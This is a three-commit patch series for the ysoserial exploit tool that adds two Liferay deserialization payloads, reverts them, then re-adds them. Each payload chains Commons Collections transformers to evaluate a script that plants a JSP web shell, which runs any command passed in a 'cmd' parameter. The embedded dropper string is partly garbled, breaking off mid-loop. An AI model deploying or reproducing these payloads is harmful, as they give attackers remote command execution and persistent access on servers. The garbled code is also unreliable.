From 979ba615a91014d79239e4cb233467839862a721 Mon Sep 17 00:00:00 2001 From: Jang Date: Tue, 11 Jun 2019 08:56:55 +0700 Subject: [PATCH 1/3] Change beanutil 1.9.2->1.8.2 Change CommonsCollections 3.1->3.2.1 Add Liferay shell drop --- pom.xml | 4 +- .../ysoserial/payloads/CommonsBeanutils1.java | 3 +- .../payloads/LiferayCC5_ShellDrop.java | 66 ++++++++++++++++ .../payloads/LiferayCC6_ShellDrop.java | 79 +++++++++++++++++++ .../payloads/annotation/Authors.java | 2 +- 5 files changed, 150 insertions(+), 4 deletions(-) create mode 100644 src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java create mode 100644 src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java diff --git a/pom.xml b/pom.xml index 73d39c47..5e9efb46 100644 --- a/pom.xml +++ b/pom.xml @@ -178,7 +178,7 @@ commons-collections commons-collections - 3.1 + 3.2.1 org.beanshell @@ -188,7 +188,7 @@ commons-beanutils commons-beanutils - 1.9.2 + 1.8.2 org.apache.commons diff --git a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java index 2495be77..db176a99 100755 --- a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java +++ b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java @@ -12,7 +12,8 @@ import ysoserial.payloads.util.Reflections; @SuppressWarnings({ "rawtypes", "unchecked" }) -@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"}) +@Dependencies({"commons-beanutils:commons-beanutils:1.8.2", "commons-collections:commons-collections:3.2.1", "commons" + + "-logging:commons-logging:1.2"}) @Authors({ Authors.FROHOFF }) public class CommonsBeanutils1 implements ObjectPayload { diff --git a/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java b/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java new file mode 100644 index 00000000..e2d1a6f2 --- /dev/null +++ b/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java 
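Review bot: The new `@Dependencies` line in the CommonsBeanutils1 hunk splits a coordinate mid-token, `"commons" + "-logging:commons-logging:1.2"`, which reads as a line-wrap accident rather than an intentional constant expression; keep each coordinate as one literal, `"commons-logging:commons-logging:1.2"`, and wrap between array elements if the line is too long. The same hunk also moves an existing, unrelated payload's declared dependencies to beanutils 1.8.2 and commons-collections 3.2.1 alongside the pom change, and neither the hunk nor the commit message says CommonsBeanutils1 was re-run against those versions; a sentence in the message, or a short comment above the annotation, would settle that. This hunk is reverted in PATCH 2/3 and reappears unchanged in PATCH 3/3, where the same two points apply.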
@@ -0,0 +1,66 @@ +package ysoserial.payloads; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; +import ysoserial.payloads.annotation.Authors; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.annotation.PayloadTest; +import ysoserial.payloads.util.JavaVersion; +import ysoserial.payloads.util.PayloadRunner; +import ysoserial.payloads.util.Reflections; + +import java.io.FileOutputStream; +import java.io.ObjectOutputStream; + +import javax.management.BadAttributeValueExpException; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Map; + +@PayloadTest( + precondition = "isApplicableJavaVersion" +) +@Dependencies({"commons-collections:commons-collections:3.2.1"}) +@Authors({Authors.MATTHIASKAISER, Authors.JASINNER, Authors.JANG}) +public class LiferayCC5_ShellDrop extends PayloadRunner implements ObjectPayload { + public LiferayCC5_ShellDrop() { + } + + public BadAttributeValueExpException getObject(String command) throws Exception { + String dropper = "var os = java.lang.System.getProperty(\"os.name\"); var path = java.lang.System.getProperty(\"java.class.path\"); print(path); var path = path.replaceAll(\"\\\\\\\\\", \"/\"); var delim = \":\"; if(path.indexOf(\";\")) {delim = \";\"}; var x1 = path.split(delim); var pathok=\"\";for(var i=0; i <%! 
public String esc(String str){ StringBuffer sb = new StringBuffer(); for(char c : str.toCharArray()) if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) sb.append( c ); else sb.append(\\\"&#\\\"+(int)(c&0xff)+\\\";\\\"); return sb.toString(); } %><% String cmd = request.getParameter(\\\"cmd\\\"); String path = java.lang.System.getProperty(\\\"java.class.path\\\"); out.println(path); if ( cmd != null) { out.println(\\\"
Command was: \\\"+esc(cmd)+\\\"\\\\n\\\"); 	java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 	String line = in.readLine(); 	while( line != null ){ 		out.println(esc(line)); 		line = in.readLine(); 	} 	out.println(\\\"
\\\"); } %>\"); writer.close(); "; + + String[] execArgs = new String[]{dropper}; + Transformer transformerChain = new ChainedTransformer(new Transformer[]{new ConstantTransformer(1)}); + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(javax.script.ScriptEngineManager.class), + new InvokerTransformer("newInstance", new Class[]{}, + new Object[]{} + ), + new InvokerTransformer("getEngineByName", new Class[]{String.class}, + new Object[]{"JavaScript"} + ), + new InvokerTransformer("eval", new Class[]{String.class}, execArgs), + new ConstantTransformer(1)}; + Map innerMap = new HashMap(); + Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); + BadAttributeValueExpException val = new BadAttributeValueExpException((Object)null); + Field valfield = val.getClass().getDeclaredField("val"); + valfield.setAccessible(true); + valfield.set(val, entry); + Reflections.setFieldValue(transformerChain, "iTransformers", transformers); + return val; + } + + public static void main(String[] args) throws Exception { + PayloadRunner.run(LiferayCC5_ShellDrop.class, args); + } + + public static boolean isApplicableJavaVersion() { + return JavaVersion.isBadAttrValExcReadObj(); + } +} diff --git a/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java b/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java new file mode 100644 index 00000000..b6c7823c --- /dev/null +++ b/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java 
@@ -0,0 +1,79 @@ +package ysoserial.payloads; + +import java.io.FileOutputStream; +import java.io.ObjectOutputStream; +import java.io.Serializable; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.HashSet; +import java.util.Map; +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; +import ysoserial.payloads.annotation.Authors; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.util.PayloadRunner; + +@Dependencies({"commons-collections:commons-collections:3.2.1"}) +@Authors({ Authors.MATTHIASKAISER, Authors.JANG }) +public class LiferayCC6_ShellDrop extends PayloadRunner implements ObjectPayload { + public Serializable getObject(String command) throws Exception { + String dropper = "var os = java.lang.System.getProperty(\"os.name\"); var path = java.lang.System.getProperty(\"java.class.path\"); print(path); var path = path.replaceAll(\"\\\\\\\\\", \"/\"); var delim = \":\"; if(path.indexOf(\";\")) {delim = \";\"}; var x1 = path.split(delim); var pathok=\"\";for(var i=0; i <%! public String esc(String str){ StringBuffer sb = new StringBuffer(); for(char c : str.toCharArray()) if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) sb.append( c ); else sb.append(\\\"&#\\\"+(int)(c&0xff)+\\\";\\\"); return sb.toString(); } %><% String cmd = request.getParameter(\\\"cmd\\\"); String path = java.lang.System.getProperty(\\\"java.class.path\\\"); out.println(path); if ( cmd != null) { out.println(\\\"
Command was: \\\"+esc(cmd)+\\\"\\\\n\\\"); 	java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 	String line = in.readLine(); 	while( line != null ){ 		out.println(esc(line)); 		line = in.readLine(); 	} 	out.println(\\\"
\\\"); } %>\"); writer.close(); "; + String[] execArgs = new String[]{dropper}; + Transformer[] transformers = new Transformer[]{new ConstantTransformer(javax.script.ScriptEngineManager.class), + new InvokerTransformer("newInstance", new Class[]{}, + new Object[]{}), + new InvokerTransformer("getEngineByName", new Class[]{String.class}, + new Object[]{"JavaScript"}), + new InvokerTransformer("eval", new Class[]{String.class}, execArgs), new ConstantTransformer(1)}; + Transformer transformerChain = new ChainedTransformer(transformers); + Map innerMap = new HashMap(); + Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); + HashSet map = new HashSet(1); + map.add("foo"); + Field f = null; + + try { + f = HashSet.class.getDeclaredField("map"); + } catch (NoSuchFieldException var18) { + f = HashSet.class.getDeclaredField("backingMap"); + } + + f.setAccessible(true); + HashMap innimpl = (HashMap) f.get(map); + Field f2 = null; + + try { + f2 = HashMap.class.getDeclaredField("table"); + } catch (NoSuchFieldException var17) { + f2 = HashMap.class.getDeclaredField("elementData"); + } + + f2.setAccessible(true); + Object[] array = (Object[]) ((Object[]) f2.get(innimpl)); + Object node = array[0]; + if (node == null) { + node = array[1]; + } + + Field keyField = null; + + try { + keyField = node.getClass().getDeclaredField("key"); + } catch (Exception var16) { + keyField = Class.forName("java.util.MapEntry").getDeclaredField("key"); + } + + keyField.setAccessible(true); + keyField.set(node, entry); + return map; + } + + public static void main(String[] args) throws Exception { + PayloadRunner.run(LiferayCC6_ShellDrop.class, args); + } +} diff --git a/src/main/java/ysoserial/payloads/annotation/Authors.java b/src/main/java/ysoserial/payloads/annotation/Authors.java index 57232da3..21e0255d 100644 --- a/src/main/java/ysoserial/payloads/annotation/Authors.java 
+++ b/src/main/java/ysoserial/payloads/annotation/Authors.java @@ -23,7 +23,7 @@ String SCRISTALLI = "scristalli"; String HANYRAX = "hanyrax"; String EDOARDOVIGNATI = "EdoardoVignati"; - + String JANG = "Jang"; String[] value() default {}; public static class Utils { From f8834ea54ad2b48c8fd05da6db6c336731ac8206 Mon Sep 17 00:00:00 2001 From: Jang Date: Tue, 11 Jun 2019 09:01:39 +0700 Subject: [PATCH 2/3] Revert "Change beanutil 1.9.2->1.8.2" This reverts commit 979ba615a91014d79239e4cb233467839862a721. --- pom.xml | 4 +- .../ysoserial/payloads/CommonsBeanutils1.java | 3 +- .../payloads/LiferayCC5_ShellDrop.java | 66 ---------------- .../payloads/LiferayCC6_ShellDrop.java | 79 ------------------- .../payloads/annotation/Authors.java | 2 +- 5 files changed, 4 insertions(+), 150 deletions(-) delete mode 100644 src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java delete mode 100644 src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java diff --git a/pom.xml b/pom.xml index 5e9efb46..73d39c47 100644 --- a/pom.xml +++ b/pom.xml @@ -178,7 +178,7 @@ commons-collections commons-collections - 3.2.1 + 3.1 org.beanshell @@ -188,7 +188,7 @@ commons-beanutils commons-beanutils - 1.8.2 + 1.9.2 org.apache.commons diff --git a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java index db176a99..2495be77 100755 --- a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java +++ b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java 
@@ -12,8 +12,7 @@ import ysoserial.payloads.util.Reflections; @SuppressWarnings({ "rawtypes", "unchecked" }) -@Dependencies({"commons-beanutils:commons-beanutils:1.8.2", "commons-collections:commons-collections:3.2.1", "commons" + - "-logging:commons-logging:1.2"}) +@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"}) @Authors({ Authors.FROHOFF }) public class CommonsBeanutils1 implements ObjectPayload { diff --git a/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java b/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java deleted file mode 100644 index e2d1a6f2..00000000 --- a/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java +++ /dev/null 
@@ -1,66 +0,0 @@ -package ysoserial.payloads; - -import org.apache.commons.collections.Transformer; -import org.apache.commons.collections.functors.ChainedTransformer; -import org.apache.commons.collections.functors.ConstantTransformer; -import org.apache.commons.collections.functors.InvokerTransformer; -import org.apache.commons.collections.keyvalue.TiedMapEntry; -import org.apache.commons.collections.map.LazyMap; -import ysoserial.payloads.annotation.Authors; -import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.annotation.PayloadTest; -import ysoserial.payloads.util.JavaVersion; -import ysoserial.payloads.util.PayloadRunner; -import ysoserial.payloads.util.Reflections; - -import java.io.FileOutputStream; -import java.io.ObjectOutputStream; - -import javax.management.BadAttributeValueExpException; -import java.lang.reflect.Field; -import java.util.HashMap; -import java.util.Map; - -@PayloadTest( - precondition = "isApplicableJavaVersion" -) -@Dependencies({"commons-collections:commons-collections:3.2.1"}) -@Authors({Authors.MATTHIASKAISER, Authors.JASINNER, Authors.JANG}) -public class LiferayCC5_ShellDrop extends PayloadRunner implements ObjectPayload { - public LiferayCC5_ShellDrop() { - } - - public BadAttributeValueExpException getObject(String command) throws Exception { - String dropper = "var os = java.lang.System.getProperty(\"os.name\"); var path = java.lang.System.getProperty(\"java.class.path\"); print(path); var path = path.replaceAll(\"\\\\\\\\\", \"/\"); var delim = \":\"; if(path.indexOf(\";\")) {delim = \";\"}; var x1 = path.split(delim); var pathok=\"\";for(var i=0; i <%! 
public String esc(String str){ StringBuffer sb = new StringBuffer(); for(char c : str.toCharArray()) if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) sb.append( c ); else sb.append(\\\"&#\\\"+(int)(c&0xff)+\\\";\\\"); return sb.toString(); } %><% String cmd = request.getParameter(\\\"cmd\\\"); String path = java.lang.System.getProperty(\\\"java.class.path\\\"); out.println(path); if ( cmd != null) { out.println(\\\"
Command was: \\\"+esc(cmd)+\\\"\\\\n\\\"); 	java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 	String line = in.readLine(); 	while( line != null ){ 		out.println(esc(line)); 		line = in.readLine(); 	} 	out.println(\\\"
\\\"); } %>\"); writer.close(); "; - - String[] execArgs = new String[]{dropper}; - Transformer transformerChain = new ChainedTransformer(new Transformer[]{new ConstantTransformer(1)}); - Transformer[] transformers = new Transformer[]{ - new ConstantTransformer(javax.script.ScriptEngineManager.class), - new InvokerTransformer("newInstance", new Class[]{}, - new Object[]{} - ), - new InvokerTransformer("getEngineByName", new Class[]{String.class}, - new Object[]{"JavaScript"} - ), - new InvokerTransformer("eval", new Class[]{String.class}, execArgs), - new ConstantTransformer(1)}; - Map innerMap = new HashMap(); - Map lazyMap = LazyMap.decorate(innerMap, transformerChain); - TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); - BadAttributeValueExpException val = new BadAttributeValueExpException((Object)null); - Field valfield = val.getClass().getDeclaredField("val"); - valfield.setAccessible(true); - valfield.set(val, entry); - Reflections.setFieldValue(transformerChain, "iTransformers", transformers); - return val; - } - - public static void main(String[] args) throws Exception { - PayloadRunner.run(LiferayCC5_ShellDrop.class, args); - } - - public static boolean isApplicableJavaVersion() { - return JavaVersion.isBadAttrValExcReadObj(); - } -} diff --git a/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java b/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java deleted file mode 100644 index b6c7823c..00000000 --- a/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java +++ /dev/null 
@@ -1,79 +0,0 @@ -package ysoserial.payloads; - -import java.io.FileOutputStream; -import java.io.ObjectOutputStream; -import java.io.Serializable; -import java.lang.reflect.Field; -import java.util.HashMap; -import java.util.HashSet; -import java.util.Map; -import org.apache.commons.collections.Transformer; -import org.apache.commons.collections.functors.ChainedTransformer; -import org.apache.commons.collections.functors.ConstantTransformer; -import org.apache.commons.collections.functors.InvokerTransformer; -import org.apache.commons.collections.keyvalue.TiedMapEntry; -import org.apache.commons.collections.map.LazyMap; -import ysoserial.payloads.annotation.Authors; -import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.util.PayloadRunner; - -@Dependencies({"commons-collections:commons-collections:3.2.1"}) -@Authors({ Authors.MATTHIASKAISER, Authors.JANG }) -public class LiferayCC6_ShellDrop extends PayloadRunner implements ObjectPayload { - public Serializable getObject(String command) throws Exception { - String dropper = "var os = java.lang.System.getProperty(\"os.name\"); var path = java.lang.System.getProperty(\"java.class.path\"); print(path); var path = path.replaceAll(\"\\\\\\\\\", \"/\"); var delim = \":\"; if(path.indexOf(\";\")) {delim = \";\"}; var x1 = path.split(delim); var pathok=\"\";for(var i=0; i <%! public String esc(String str){ StringBuffer sb = new StringBuffer(); for(char c : str.toCharArray()) if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) sb.append( c ); else sb.append(\\\"&#\\\"+(int)(c&0xff)+\\\";\\\"); return sb.toString(); } %><% String cmd = request.getParameter(\\\"cmd\\\"); String path = java.lang.System.getProperty(\\\"java.class.path\\\"); out.println(path); if ( cmd != null) { out.println(\\\"
Command was: \\\"+esc(cmd)+\\\"\\\\n\\\"); 	java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 	String line = in.readLine(); 	while( line != null ){ 		out.println(esc(line)); 		line = in.readLine(); 	} 	out.println(\\\"
\\\"); } %>\"); writer.close(); "; - String[] execArgs = new String[]{dropper}; - Transformer[] transformers = new Transformer[]{new ConstantTransformer(javax.script.ScriptEngineManager.class), - new InvokerTransformer("newInstance", new Class[]{}, - new Object[]{}), - new InvokerTransformer("getEngineByName", new Class[]{String.class}, - new Object[]{"JavaScript"}), - new InvokerTransformer("eval", new Class[]{String.class}, execArgs), new ConstantTransformer(1)}; - Transformer transformerChain = new ChainedTransformer(transformers); - Map innerMap = new HashMap(); - Map lazyMap = LazyMap.decorate(innerMap, transformerChain); - TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); - HashSet map = new HashSet(1); - map.add("foo"); - Field f = null; - - try { - f = HashSet.class.getDeclaredField("map"); - } catch (NoSuchFieldException var18) { - f = HashSet.class.getDeclaredField("backingMap"); - } - - f.setAccessible(true); - HashMap innimpl = (HashMap) f.get(map); - Field f2 = null; - - try { - f2 = HashMap.class.getDeclaredField("table"); - } catch (NoSuchFieldException var17) { - f2 = HashMap.class.getDeclaredField("elementData"); - } - - f2.setAccessible(true); - Object[] array = (Object[]) ((Object[]) f2.get(innimpl)); - Object node = array[0]; - if (node == null) { - node = array[1]; - } - - Field keyField = null; - - try { - keyField = node.getClass().getDeclaredField("key"); - } catch (Exception var16) { - keyField = Class.forName("java.util.MapEntry").getDeclaredField("key"); - } - - keyField.setAccessible(true); - keyField.set(node, entry); - return map; - } - - public static void main(String[] args) throws Exception { - PayloadRunner.run(LiferayCC6_ShellDrop.class, args); - } -} diff --git a/src/main/java/ysoserial/payloads/annotation/Authors.java b/src/main/java/ysoserial/payloads/annotation/Authors.java index 21e0255d..57232da3 100644 --- a/src/main/java/ysoserial/payloads/annotation/Authors.java 
+++ b/src/main/java/ysoserial/payloads/annotation/Authors.java @@ -23,7 +23,7 @@ String SCRISTALLI = "scristalli"; String HANYRAX = "hanyrax"; String EDOARDOVIGNATI = "EdoardoVignati"; - String JANG = "Jang"; + String[] value() default {}; public static class Utils { From 66264757c94d8911f2b8ecc36a9e1167044420c8 Mon Sep 17 00:00:00 2001 From: Jang Date: Tue, 11 Jun 2019 09:07:21 +0700 Subject: [PATCH 3/3] Change beanutil 1.9.2->1.8.2 Change CommonsCollections 3.1->3.2.1 Add Liferay shell drop --- pom.xml | 4 +- .../ysoserial/payloads/CommonsBeanutils1.java | 3 +- .../payloads/LiferayCC5_ShellDrop.java | 67 ++++++++++++++++ .../payloads/LiferayCC6_ShellDrop.java | 79 +++++++++++++++++++ .../payloads/annotation/Authors.java | 1 + 5 files changed, 151 insertions(+), 3 deletions(-) create mode 100644 src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java create mode 100644 src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java diff --git a/pom.xml b/pom.xml index 73d39c47..5e9efb46 100644 --- a/pom.xml +++ b/pom.xml @@ -178,7 +178,7 @@ commons-collections commons-collections - 3.1 + 3.2.1 org.beanshell @@ -188,7 +188,7 @@ commons-beanutils commons-beanutils - 1.9.2 + 1.8.2 org.apache.commons diff --git a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java index 2495be77..db176a99 100755 --- a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java +++ b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java @@ -12,7 +12,8 @@ import ysoserial.payloads.util.Reflections; @SuppressWarnings({ "rawtypes", "unchecked" }) -@Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"}) +@Dependencies({"commons-beanutils:commons-beanutils:1.8.2", "commons-collections:commons-collections:3.2.1", "commons" + + "-logging:commons-logging:1.2"}) @Authors({ Authors.FROHOFF }) public class CommonsBeanutils1 implements ObjectPayload { 
diff --git a/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java b/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java new file mode 100644 index 00000000..069af0ea --- /dev/null +++ b/src/main/java/ysoserial/payloads/LiferayCC5_ShellDrop.java 
@@ -0,0 +1,67 @@ + +package ysoserial.payloads; + +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; +import ysoserial.payloads.annotation.Authors; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.annotation.PayloadTest; +import ysoserial.payloads.util.JavaVersion; +import ysoserial.payloads.util.PayloadRunner; +import ysoserial.payloads.util.Reflections; + +import java.io.FileOutputStream; +import java.io.ObjectOutputStream; + +import javax.management.BadAttributeValueExpException; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Map; + +@SuppressWarnings({"rawtypes", "unchecked"}) +@PayloadTest ( precondition = "isApplicableJavaVersion") +@Dependencies({"commons-collections:commons-collections:3.1"}) + +@Authors({ Authors.MATTHIASKAISER, Authors.JASINNER, Authors.JANG }) +public class LiferayCC5_ShellDrop extends PayloadRunner implements ObjectPayload { + public LiferayCC5_ShellDrop() { + } + + public BadAttributeValueExpException getObject(String command) throws Exception { + String dropper = "var os = java.lang.System.getProperty(\"os.name\"); var path = java.lang.System.getProperty(\"java.class.path\"); print(path); var path = path.replaceAll(\"\\\\\\\\\", \"/\"); var delim = \":\"; if(path.indexOf(\";\")) {delim = \";\"}; var x1 = path.split(delim); var pathok=\"\";for(var i=0; i <%! 
public String esc(String str){ StringBuffer sb = new StringBuffer(); for(char c : str.toCharArray()) if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) sb.append( c ); else sb.append(\\\"&#\\\"+(int)(c&0xff)+\\\";\\\"); return sb.toString(); } %><% String cmd = request.getParameter(\\\"cmd\\\"); String path = java.lang.System.getProperty(\\\"java.class.path\\\"); out.println(path); if ( cmd != null) { out.println(\\\"
Command was: \\\"+esc(cmd)+\\\"\\\\n\\\"); 	java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 	String line = in.readLine(); 	while( line != null ){ 		out.println(esc(line)); 		line = in.readLine(); 	} 	out.println(\\\"
\\\"); } %>\"); writer.close(); "; + + String[] execArgs = new String[]{dropper}; + Transformer transformerChain = new ChainedTransformer(new Transformer[]{new ConstantTransformer(1)}); + Transformer[] transformers = new Transformer[]{ + new ConstantTransformer(javax.script.ScriptEngineManager.class), + new InvokerTransformer("newInstance", new Class[]{}, + new Object[]{} + ), + new InvokerTransformer("getEngineByName", new Class[]{String.class}, + new Object[]{"JavaScript"} + ), + new InvokerTransformer("eval", new Class[]{String.class}, execArgs), + new ConstantTransformer(1)}; + Map innerMap = new HashMap(); + Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); + BadAttributeValueExpException val = new BadAttributeValueExpException((Object)null); + Field valfield = val.getClass().getDeclaredField("val"); + valfield.setAccessible(true); + valfield.set(val, entry); + Reflections.setFieldValue(transformerChain, "iTransformers", transformers); + return val; + } + + public static void main(String[] args) throws Exception { + PayloadRunner.run(LiferayCC5_ShellDrop.class, args); + } + + public static boolean isApplicableJavaVersion() { + return JavaVersion.isBadAttrValExcReadObj(); + } +} diff --git a/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java b/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java new file mode 100644 index 00000000..b6c7823c --- /dev/null +++ b/src/main/java/ysoserial/payloads/LiferayCC6_ShellDrop.java 
@@ -0,0 +1,79 @@ +package ysoserial.payloads; + +import java.io.FileOutputStream; +import java.io.ObjectOutputStream; +import java.io.Serializable; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.HashSet; +import java.util.Map; +import org.apache.commons.collections.Transformer; +import org.apache.commons.collections.functors.ChainedTransformer; +import org.apache.commons.collections.functors.ConstantTransformer; +import org.apache.commons.collections.functors.InvokerTransformer; +import org.apache.commons.collections.keyvalue.TiedMapEntry; +import org.apache.commons.collections.map.LazyMap; +import ysoserial.payloads.annotation.Authors; +import ysoserial.payloads.annotation.Dependencies; +import ysoserial.payloads.util.PayloadRunner; + +@Dependencies({"commons-collections:commons-collections:3.2.1"}) +@Authors({ Authors.MATTHIASKAISER, Authors.JANG }) +public class LiferayCC6_ShellDrop extends PayloadRunner implements ObjectPayload { + public Serializable getObject(String command) throws Exception { + String dropper = "var os = java.lang.System.getProperty(\"os.name\"); var path = java.lang.System.getProperty(\"java.class.path\"); print(path); var path = path.replaceAll(\"\\\\\\\\\", \"/\"); var delim = \":\"; if(path.indexOf(\";\")) {delim = \";\"}; var x1 = path.split(delim); var pathok=\"\";for(var i=0; i <%! public String esc(String str){ StringBuffer sb = new StringBuffer(); for(char c : str.toCharArray()) if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' ) sb.append( c ); else sb.append(\\\"&#\\\"+(int)(c&0xff)+\\\";\\\"); return sb.toString(); } %><% String cmd = request.getParameter(\\\"cmd\\\"); String path = java.lang.System.getProperty(\\\"java.class.path\\\"); out.println(path); if ( cmd != null) { out.println(\\\"
Command was: \\\"+esc(cmd)+\\\"\\\\n\\\"); 	java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); 	String line = in.readLine(); 	while( line != null ){ 		out.println(esc(line)); 		line = in.readLine(); 	} 	out.println(\\\"
\\\"); } %>\"); writer.close(); "; + String[] execArgs = new String[]{dropper}; + Transformer[] transformers = new Transformer[]{new ConstantTransformer(javax.script.ScriptEngineManager.class), + new InvokerTransformer("newInstance", new Class[]{}, + new Object[]{}), + new InvokerTransformer("getEngineByName", new Class[]{String.class}, + new Object[]{"JavaScript"}), + new InvokerTransformer("eval", new Class[]{String.class}, execArgs), new ConstantTransformer(1)}; + Transformer transformerChain = new ChainedTransformer(transformers); + Map innerMap = new HashMap(); + Map lazyMap = LazyMap.decorate(innerMap, transformerChain); + TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); + HashSet map = new HashSet(1); + map.add("foo"); + Field f = null; + + try { + f = HashSet.class.getDeclaredField("map"); + } catch (NoSuchFieldException var18) { + f = HashSet.class.getDeclaredField("backingMap"); + } + + f.setAccessible(true); + HashMap innimpl = (HashMap) f.get(map); + Field f2 = null; + + try { + f2 = HashMap.class.getDeclaredField("table"); + } catch (NoSuchFieldException var17) { + f2 = HashMap.class.getDeclaredField("elementData"); + } + + f2.setAccessible(true); + Object[] array = (Object[]) ((Object[]) f2.get(innimpl)); + Object node = array[0]; + if (node == null) { + node = array[1]; + } + + Field keyField = null; + + try { + keyField = node.getClass().getDeclaredField("key"); + } catch (Exception var16) { + keyField = Class.forName("java.util.MapEntry").getDeclaredField("key"); + } + + keyField.setAccessible(true); + keyField.set(node, entry); + return map; + } + + public static void main(String[] args) throws Exception { + PayloadRunner.run(LiferayCC6_ShellDrop.class, args); + } +} diff --git a/src/main/java/ysoserial/payloads/annotation/Authors.java b/src/main/java/ysoserial/payloads/annotation/Authors.java index 57232da3..b6d7aee5 100644 --- a/src/main/java/ysoserial/payloads/annotation/Authors.java 
+++ b/src/main/java/ysoserial/payloads/annotation/Authors.java @@ -23,6 +23,7 @@ String SCRISTALLI = "scristalli"; String HANYRAX = "hanyrax"; String EDOARDOVIGNATI = "EdoardoVignati"; + String JANG = "Jang"; String[] value() default {};